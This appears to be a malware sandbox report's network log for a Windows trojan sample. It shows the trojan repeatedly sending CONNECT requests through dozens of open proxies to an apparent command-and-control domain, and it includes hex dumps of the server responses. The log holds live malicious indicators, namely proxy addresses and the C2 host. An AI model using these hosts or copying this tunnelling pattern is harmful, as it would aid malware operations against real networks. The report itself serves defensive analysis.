                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 69 65 3d 65 64 67 65 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 73 74 61 74 69 63 2f 73 72 63 2f 69 6d 67 2f 66 75 74 75 72 61 2e 70 6e 67 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 55 54 55 52 41 31 30 30 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 3e 0d 0a 3c 21 2d 2d 20 46 6f 6e 74 66 61 63 65 73 20 43 53 53 2d 2d 3e 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 63 73 73 2f 66 6f 6e 74 2d 66 61 63 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 3e 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 63 6f 64 69 67 6f 73 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2d 35 2f 63 73 73 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2d 61 6c 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 3e 0d 0a 3c 21 2d 2d 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 63 6f 64 69 67 6f 73 2f 6d 64 69 2d 66 6f 6e 74 2f 63 73 73 2f 6d 61 74 65 72 69 61 6c 2d 64 65 73 69 67 6e 2d 69 63 6f 6e 69 63 2d 66 6f 6e 74 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 3e 2d 2d 3e 0d 0a 0d 0a 3c 21 2d 2d 20 42 6f 6f 74 73 74 72 61 70 20 43 53 53 2d 2d 3e 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 73 74 61 74 69 63 2f 6c 69 62 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2f 62 6f 6f 74 73 74 72 61 70 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 3e 0d 0a 0d 0a 3c 21 2d 2d 20 63 6f 64 69 67 6f 73 20 43 53 53 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 63 6f 64 69 67 6f 73 2f 61 6e 69 6d 73 69 74 69 6f 6e 2f 61 6e 69 6d 73 69 74 69 6f 6e 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 3e 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 63 6f 64 69 67 6f 73 2f 70 65 72 66 65 63 74 2d 73 63 72 6f 6c 6c 62 61 72 2f 70 65 72 66 65 63 74 2d 73 63 72 6f 6c 6c 62 61 72 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 3e 2d 2d 3e 0d 0a 0d 0a 3c 21 2d 2d
                                                                                Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta http-equiv="X-UA-Compatible" content="ie=edge"> <link rel="icon" href="static/src/img/futura.png"> <title>FUTURA100</title><link href="css/style.css" rel="stylesheet" media="all">... Fontfaces CSS--><link href="css/font-face.css" rel="stylesheet" media="all"><link href="codigos/font-awesome-5/css/fontawesome-all.min.css" rel="stylesheet" media="all">...<link href="codigos/mdi-font/css/material-design-iconic-font.min.css" rel="stylesheet" media="all">-->... Bootstrap CSS--><link href="static/lib/css/bootstrap/bootstrap.css" rel="stylesheet" media="all">... codigos CSS<link href="codigos/animsition/animsition.min.css" rel="stylesheet" media="all"><link href="codigos/perfect-scrollbar/perfect-scrollbar.css" rel="stylesheet" media="all">-->...
                                                                                Feb 23, 2024 14:28:24.120424032 CET1286INData Raw: 20 4d 61 69 6e 20 43 53 53 2d 2d 3e 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2d 74 6f 75 72 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22
                                                                                Data Ascii: Main CSS--><link href="css/bootstrap-tour.min.css" rel="stylesheet" media="all"><link href="css/bootstrap-tour-standalone.css" rel="stylesheet" media="all"><link href="css/theme.css" rel="stylesheet" media="all"><link rel="stylesh
                                                                                Feb 23, 2024 14:28:24.120592117 CET1286INData Raw: 74 72 61 70 2d 74 6f 75 72 2d 30 2e 31 32 2e 30 2f 72 65 74 69 6e 61 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63
                                                                                Data Ascii: trap-tour-0.12.0/retina.min.js"></script><script src="https://cdnjs.cloudflare.com/ajax/libs/xlsx/0.18.5/xlsx.full.min.js" integrity="sha512-r22gChDnGvBylk90+2e/ycr3RVrDi8DIOkIGNhJlKfuyQM4tIRAI062MaV8sfjQKYVGjOBaZBOA87z+IhZE9DA==" crossorigi
                                                                                Feb 23, 2024 14:28:24.120805025 CET1286INData Raw: 69 c3 b3 6e 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e
                                                                                Data Ascii: in</button> </div> </div> </div> </div> <div class="p-3 d-flex justify-content-center mt-5" style="background-color: rgba(0, 0, 0, -0.9);width: 400px; margin-left:auto;margin-r
                                                                                Feb 23, 2024 14:28:24.120820045 CET298INData Raw: 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 73 74 61 74 69 63 2f 73 72 63 2f 6a 73 2f 6d 61 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 73 74 61 74 69 63 2f 73 72 63 2f 6a 73 2f 6c 6f 67 69
                                                                                Data Ascii: <script src="static/src/js/main.js"></script> <script src="static/src/js/login.js"></script> <script src="static/lib/js/bootstrap-tour-0.12.0/bootstrap-tour.min.js"></script> <script src="static/lib/js/bootstrap-tour-0.12.0/bootst
                                                                                Feb 23, 2024 14:28:24.121099949 CET394OUTData Raw: 16 03 03 01 85 01 00 01 81 03 03 65 d8 9d 77 0e 5e 20 1d 00 ca 88 67 cd f4 3b 88 70 88 33 1a c2 1a 47 b6 25 e6 56 23 32 98 6d 77 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                                                                                Data Ascii: ew^ g;p3G%V#2mw*,+0/$#('=<5/.-+(heygirlisheeverythingyouwantedinaman.com#<LoyGo$(*a~;C
                                                                                Feb 23, 2024 14:28:24.370346069 CET494INHTTP/1.1 400 Bad Request
                                                                                Date: Fri, 23 Feb 2024 13:28:24 GMT
                                                                                Server: Apache/2.4.56 (Ubuntu)
                                                                                Content-Length: 312
                                                                                Connection: close
                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 67 72 2e 66 75 74 75 72 61 31 30 30 2e 63 6f 6d 2e 70 79 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.56 (Ubuntu) Server at agr.futura100.com.py Port 80</address></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                268192.168.2.850143175.106.10.22778785828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.873117924 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:26.882419109 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:29.991995096 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:36.009517908 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                269192.168.2.850941210.211.113.34805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.874356985 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                270192.168.2.851070184.178.172.5153035828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.878923893 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                271192.168.2.85107282.113.157.122312805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.888550043 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                272192.168.2.850931124.71.131.19280805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.895421982 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:29.373648882 CET28INHTTP/1.1 502 Bad Gateway


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                273192.168.2.851092162.243.102.20797645828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.896025896 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                274192.168.2.850808115.239.234.4373025828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.903466940 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:24.624819994 CET90INHTTP/1.1 200 OK
                                                                                Content-Type: application/json
                                                                                Connection: close
                                                                                Content-Length: 55


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                275192.168.2.85107472.210.208.10141455828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.903877020 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                276192.168.2.85105591.241.217.5890905828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.904582977 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                277192.168.2.851075184.181.217.22041455828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.904783964 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                278192.168.2.85108346.35.9.110805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.932590961 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:24.094922066 CET340INHTTP/1.1 400 Bad Request
                                                                                Server: nginx/1.12.2
                                                                                Date: Fri, 23 Feb 2024 13:28:23 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Content-Length: 173
                                                                                Connection: close
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.2</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                279192.168.2.850979116.199.170.1741455828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.935846090 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                280192.168.2.85023436.91.98.11581815828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.942815065 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                281192.168.2.850192171.244.140.160175255828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.946304083 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:26.991740942 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:29.992295980 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:36.009494066 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                282192.168.2.851027106.51.62.10680805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.966278076 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:25.550879002 CET220INHTTP/1.0 403 Banned site: Content-Type: text/html<HTML><HEAD><TITLE>DansGuardian - Banned site: </TITLE></HEAD><BODY><H1>DansGuardian - Banned site: </H1>https://heygirlisheeverythingyouwantedinaman.com</BODY></HTML>
                                                                                Data Raw:
                                                                                Data Ascii:


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                283192.168.2.85109498.188.47.13241455828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.969875097 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                284192.168.2.85107731.223.22.2110805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.975147963 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                285192.168.2.850995183.89.40.23210805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.975397110 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                286192.168.2.851093193.239.58.9280815828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.012918949 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                287192.168.2.851121152.32.238.63380805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.015147924 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                288192.168.2.850695142.54.235.941455828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.023870945 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                289192.168.2.850264222.111.18.67805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.024132013 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:24.307241917 CET166INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                290192.168.2.850393184.181.217.21341455828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.027420044 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                291192.168.2.850428166.62.38.10087305828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.028254032 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:27.194791079 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:30.288908005 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:36.398116112 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                292192.168.2.851103174.75.211.22241455828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.037014961 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                293192.168.2.85110668.1.210.18941455828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.038317919 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                294192.168.2.85108493.90.212.241535828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.039748907 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                295192.168.2.851114174.77.111.19641455828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.063458920 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                296192.168.2.851131104.16.105.207805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.066973925 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:24.154897928 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:24 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
